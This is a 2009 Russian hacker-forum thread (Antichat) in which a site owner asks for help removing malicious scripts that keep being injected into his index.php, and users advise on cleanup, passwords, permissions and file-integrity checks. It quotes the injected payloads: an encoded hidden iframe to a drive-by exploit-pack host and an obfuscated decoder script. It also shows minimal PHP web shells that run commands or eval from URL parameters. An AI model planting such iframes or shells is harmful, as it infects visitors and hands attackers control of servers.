Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Вредоносный код на сайте!!! (https://forum.antichat.xyz/showthread.php?t=125364)

mff 15.06.2009 13:32
Вредоносный код на сайте!!!
 
Добрый день, дорогие форумчане! :)
Вобщем вот такая произошла у меня ситуация, захожу с утра на сайт, а там ошибка. Ни кто ничего не трогал, всё работало, хостер надёжный. Полез по ftp, в индексе вот такую заразу вырезал:
Код HTML:
<script language="javascript">
document.write(unescape(' %3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%72%75%62%61%35%2E%63%6E%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E '));
</script>
:mad:

Такая же вата была, когда я работал в студии Веб дизайна. Я чистил каждый день сайты.
В корне, во всех файлах, был добавлен подобный код. С утра приходишь - то же самое.
Что они только не делали, и меняли ftp клиента и виндовс и по 3 антивиря на машину - ни чего не помогало.
Прошу вашей помощи, помогите разобраться, что, к чему. :confused:

Спасибо!

diehard 15.06.2009 13:36
напиши УРЛ сайта, все из базы удалят :)

Pashkela 15.06.2009 13:37
Скорее всего вирус локальный (на твоем домашнем компе, или откуда ты там по фтп заходишь). А вообще вариантов миллиард и еще один

ph1l1ster 15.06.2009 13:38
Код:
<iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe>
хорошо чистиш? ищи шеллы, меня пассы, или на компе у тебя локальный трой

mff 15.06.2009 18:05
Пару троев грохнул! Пасы сменил.

Tigger 15.06.2009 18:41
Может в каком-нить файле шелл просто?

mff 15.06.2009 18:59
Tigger, можиет, но как узнать?

Tigger 15.06.2009 19:06
Проверяй каждый файл на наличие вредоносного кода.

POS_troi 15.06.2009 19:15
Цитата:
можиет, но как узнать?
для начала с автора нужно вытащить инфу о версии двига =)

Dobby007 15.06.2009 19:19
То что это шелл - врятли...
Это скорее троянчик... причем недавно сделаннный...

Код:
<iframe src="http://truba5.cn/index.php" width=0 height=0 border=0></iframe>
Открыл я этот сайт... Вот че получается. ПРи зарузке ентого сайтика грузится PDF документ прямо в браузере. Затем этот PDF документ каким-то образом загружает на комп основную вирусяку e.exe, которая сохраняется в папке C:\Documents and Settings\{USER}\Local Settings\Temp и опять же как-то запускает ее (КАК!?). Вот отчеты по e.exe:
Код:
http://www.virustotal.com/ru/analisis/0f51e07788d3f945d6b94b83c03d83c136a287ad9545c07ae58aa1d152fa8c1b-1245078728
Это лично у меня так было. Можете конечно сами попробывать, если хотите.
Когда открыл сайт подумал вначале, что хрень какая-та (PDF документа как такогого там нет, просто грузится плагин PDF Reader'a в опере)... Так бы наверное он у меня и висел (ну всмысле вирусяка), если бы винда не выдала НЕ ОТПРАВЛЯТЬ по истечению какого-то времени :)

P.S. Так бы подумал что просто типо счетчик.... Кому-то надо посетителей нагонять, а здесь оказывается все круче =))

POS_troi 15.06.2009 19:32
Цитата:
PDF Reader'a
а ты думаеш что этот плагин является образцово показательной программой и не содержит дырок? ;)

Dobby007 15.06.2009 19:41
Цитата:
Сообщение от POS_troi
а ты думаеш что этот плагин является образцово показательной программой и не содержит дырок? ;)
Нет. Я так не думаю. Просто стало интересно как такое можно осуществить... ;) :) И я думаю не только одному мне...

POS_troi 15.06.2009 19:47
ну допустим почитай тут

http://www.securitylab.ru/vulnerability/362445.php

big_BRAT 15.06.2009 19:56
http://truba5.cn/stats.php
связка сплойтов Unique Pack 2, причем последняя версия. Если интересно про тот сплойт читай тут _http://forum.web-hack.ru/index.php?showtopic=80144

Dobby007 15.06.2009 20:00
Цитата:
Сообщение от POS_troi
ну допустим почитай тут
http://www.securitylab.ru/vulnerability/362445.php
Цитата:
http://truba5.cn/stats.php
связка сплойтов Unique Pack 2, причем последняя версия. Если интересно про тот сплойт читай тут _http://forum.web-hack.ru/index.php?showtopic=80144
+1 :)

Krist_ALL 15.06.2009 20:06
Много связок грузятся через яваскрипт, неужели трудна разработчикам браузеров проконтролировать действия яваскрипта? Я видел как исхещряюца с кодом чтобы обмануть браузер,но все же... По поводу pdf, интересная идея, грузить троя через дыру в плагине.. Фантазии нет придела!
А чтобы не вычищать каждый день ифрэймы и яваскрипты, то надо хранить на балванке копию сайта и если какието произошли изменения, то файлики обновить и все, просто если сайт большой, замаешься чистить. А еще хорошо спрятанный шелл хрен найдешь.

mff 15.06.2009 20:31
Цитата:
Сообщение от POS_troi
для начала с автора нужно вытащить инфу о версии двига =)
самописный :)

POS_troi 15.06.2009 20:49
Я на всех ресурсах использовал скриптик который проверял (по заданию в "кроне" ) Суммы всех файлов и в случае чего отписывал на мыло и заменял файл на оригинальный, но все это было на VDS.

diehard 16.06.2009 18:18
Цитата:
Сообщение от POS_troi
Я на всех ресурсах использовал скриптик который проверял (по заданию в "кроне" ) Суммы всех файлов и в случае чего отписывал на мыло и заменял файл на оригинальный, но все это было на VDS.
такие хитроумные админы на gov-ах часто попадаются :(

mff 17.06.2009 11:30
Блин, сегодня захожу, там уже другая ***ня:
Код HTML:
<script language="javascript">function _lUPNLpHJVX7T3P( _lXm9tW7QM2MwHU ){var _lxQthEExSQdZZz = "Uynwt85eFPV1QOfELcWBRJG+gxZMh6Xvr7kb3d4/pKu9iNAqoTs2az0mSDCHIjlY";var _lxXJqmgSlQpjg1 = '';var _lbtojDbzx931xM = 18;var _lHQlhGZ4PFhvYJ = 0;for ( var _lBDsi5JRjsUAiH = 0; _lBDsi5JRjsUAiH < _lXm9tW7QM2MwHU.length; _lBDsi5JRjsUAiH++ ) { var _l9b9wnGDPoJpiY = _lxQthEExSQdZZz.indexOf( _lXm9tW7QM2MwHU.charAt( _lBDsi5JRjsUAiH ) ); if ( _lbtojDbzx931xM == 0 ) { _lHQlhGZ4PFhvYJ = _lHQlhGZ4PFhvYJ | _l9b9wnGDPoJpiY; var _luGKJPMN7vIHCr = ( _lHQlhGZ4PFhvYJ & 0xFF0000 ) >> 16;if ( _luGKJPMN7vIHCr != 0 ) {_lxXJqmgSlQpjg1 += String.fromCharCode( _luGKJPMN7vIHCr );}var _l0XsYfs0eeeliu = ( _lHQlhGZ4PFhvYJ & 0xFF00 ) >> 8;if ( _l0XsYfs0eeeliu != 0 ){_lxXJqmgSlQpjg1 += String.fromCharCode( _l0XsYfs0eeeliu );}var _lPrZyGK4RUKehH = _lHQlhGZ4PFhvYJ & 0xFF;if ( _lPrZyGK4RUKehH != 0 ){_lxXJqmgSlQpjg1 += String.fromCharCode( _lPrZyGK4RUKehH );}_lHQlhGZ4PFhvYJ = 0;_lbtojDbzx931xM    = 18;} else {_l9b9wnGDPoJpiY = _l9b9wnGDPoJpiY << _lbtojDbzx931xM;_lHQlhGZ4PFhvYJ = _lHQlhGZ4PFhvYJ | _l9b9wnGDPoJpiY;_lbtojDbzx931xM -= 6;}}return _lxXJqmgSlQpjg1;} document.write( _lUPNLpHJVX7T3P( 'E5d4h48NxWy2h4QjF47a6eUC1sjah/JkgBRAg0SqZGD3x+rAh57oFkymZGcaZwaTF57dZG6p6waTFeOaXGTdEWP0Z+OKg4diZ+cDfkypZGc3xGSkEboqZGxsgGzdErUU' ) );</script>
Помогите, хелп, приклеевается в конец документа index.php :mad: Что делать? Вири на компе подавил

POS_troi 17.06.2009 12:25
Цитата:
такие хитроумные админы на gov-ах часто попадаются
К сожалению на gov не работал =)

Цитата:
Блин, сегодня захожу, там уже другая ***ня:
Пасс на ФТП поменял?

если не боишся то можеш кинуть в личку ссылку на архив с копией файлов двига. бум искать шелл.

Dobby007 17.06.2009 13:28
Цитата:
Сообщение от mff
Блин, сегодня захожу, там уже другая ***ня:
Помогите, хелп, приклеевается в конец документа index.php :mad: Что делать? Вири на компе подавил
Все, все да не все :)
Твой код соответствует этому:
Код:
<script language="javascript">
function dosometing( subvalue ){
var s1 = "Uynwt85eFPV1QOfELcWBRJG+gxZMh6Xvr7kb3d4/pKu9iNAqoTs2az0mSDCHIjlY";
var s2 = '';
var s3 = 18;
var s4 = 0;
for ( var i = 0; i < subvalue.length; i++ ) {
var s5 = s1.indexOf( subvalue.charAt( i ) );
if ( s3 == 0 ) {
s4 = s4 | s5;
var s6 = ( s4 & 0xFF0000 ) >> 16;
if ( s6 != 0 ) {
s2 += String.fromCharCode( s6 );
}
var s7 = ( s4 & 0xFF00 ) >> 8;
if ( s7 != 0 ){
s2 += String.fromCharCode( s7 );
}
var s8 = s4 & 0xFF;
if ( s8 != 0 ){
s2 += String.fromCharCode( s8 );
}
s4 = 0;
s3    = 18;
} else {
s5 = s5 << s3;
s4 = s4 | s5;
s3 -= 6;
}
}
return s2;
}
alert( dosometing( 'E5d4h48NxWy2h4QjF47a6eUC1sjah/JkgBRAg0SqZGD3x+rAh57oFkymZGcaZwaTF57dZG6p6waTFeOa  XGTdEWP0Z+OKg4diZ+cDfkypZGc3xGSkEboqZGxsgGzdErUU' ) );
</script>
Что собственно сильно на результат не влияет :)
Цитата:
<iframe src="http://truba5.cn/index.php" width=1 height=1 sty???SO'f?6?&???G????FFVa#aAo?g&OSa
Хотя немного странно...

Цитата:
если не боишся то можеш кинуть в личку ссылку на архив с копией файлов двига. бум искать шелл.
ИМХО это все-таки троян (ну всмысле автоматом делается). Просто внимательно надо посмотреть принцип работы...
А че шелл?.. Если это и шелл (хотя маловероятно), то шелл ТС и сам может найти...
Весь PHP-код на сайте посмотри. Там что-то "инородное" сразу, в принципе, невооруженным глазом видно :)

mff 17.06.2009 16:01
Спасибо, полез искать заразу :(

$n@ke 17.06.2009 17:52
сервер на никсах?
смотри тщательно процессы. Все эти дела может запускать простенький скрипт, фопеном грузить откуда-то то, что надо и все..раз в час или в другой промежуток времени. вобще выставь r-r-r на индекс.пхп, а еще лучше човни индекс другим юзером)) и права на запись потом уже убери.корень не забудь тоже.

mff 17.06.2009 19:07
$n@ke, спасибо, поменяю права сейчас! :)

Нашел гниду! В папке инклудес валялась, посмотрите, что за дрянь:

news127.inc больше метра весит :)

Dobby007 17.06.2009 20:32
Цитата:
Сообщение от mff
$n@ke, спасибо, поменяю права сейчас! :)
Нашел гниду! В папке инклудес валялась, посмотрите, что за дрянь:
news127.inc
Это не шелл. Это прайс-лист, который ты можешь открыть и посмотреть, допустим, Word'ом 2007 :)
Кстати он там и делался... :)
Шелл это, допустим, вот так:
Код:
<?php
if(isset($_GET['cmd']){
system($_GET['cmd']);
passthru($_GET['cmd']);
}
?>
При чем данный код, может находиться хоть в середине, хоть в конце, хоть в начале документа. Ну это самый, что ни на есть простой тип. Более сложный это.... ну допустим... r57shell (взял его так как он и самый распространенный)...

Цитата:
Сообщение от mff
больше метра весит :)
На 3 кб меньше :p :D

big_BRAT 17.06.2009 20:53
а ты точно уверен в хостинге? те сайты которые крутятся на этом же хостинге не страдают той же заразой? в саппорт не обращался?

проверь по дате, может найдеш файлик который ты не менял, поищи по содержанию eval, system (хотя он может удаленно инклудиться), просмотри лог апача... а так $n@ke написал все правильно

geforse 17.06.2009 21:09
Цитата:
Сообщение от POS_troi
Я на всех ресурсах использовал скриптик который проверял (по заданию в "кроне" ) Суммы всех файлов и в случае чего отписывал на мыло и заменял файл на оригинальный, но все это было на VDS.
Так этот "скриптик" можно изменить:

<?php echo "Всё зае*ись! Шелов не обнаружено"; ?> ;)

Поэтому удалять его нужно с сервера до следующей проверки :)

mff 17.06.2009 21:13
Цитата:
Сообщение от big_BRAT
а ты точно уверен в хостинге? те сайты которые крутятся на этом же хостинге не страдают той же заразой? в саппорт не обращался?

проверь по дате, может найдеш файлик который ты не менял, поищи по содержанию eval, system (хотя он может удаленно инклудиться), просмотри лог апача... а так $n@ke написал все правильно
Хостинг sweb.ru
Обращаться нет смысла, как всегда скажут смотрите свой комп. Др сайты на этом хосте норм! :)

Ctacok 17.06.2009 23:11
Цитата:
Сообщение от Tigger
Проверяй каждый файл на наличие вредоносного кода.
PHP код:
<?PHP
eval($_GET['c']);
?>
Врятдле это антивирус запалит

darknight 20.06.2009 21:35
Интерестно,а можно выложить такой код?т.е. что-бы сделать страничку с вирей?

zannussi 24.06.2009 23:32
Как я понял, ифрейм добавляется с переодичностью, поиск идет по index.php, indeh.html, index.htm и так далее. И на сколько мне известно (или в апаче или где, сам не спец) можно делать, чтоб при заходе на site.com мы заходили не на site.com/index.php, а например, site.com/tratata.php. Это, конечно, только, чтоб не было ифреймов, а было время спокойно поискать что откуда


Время: 01:20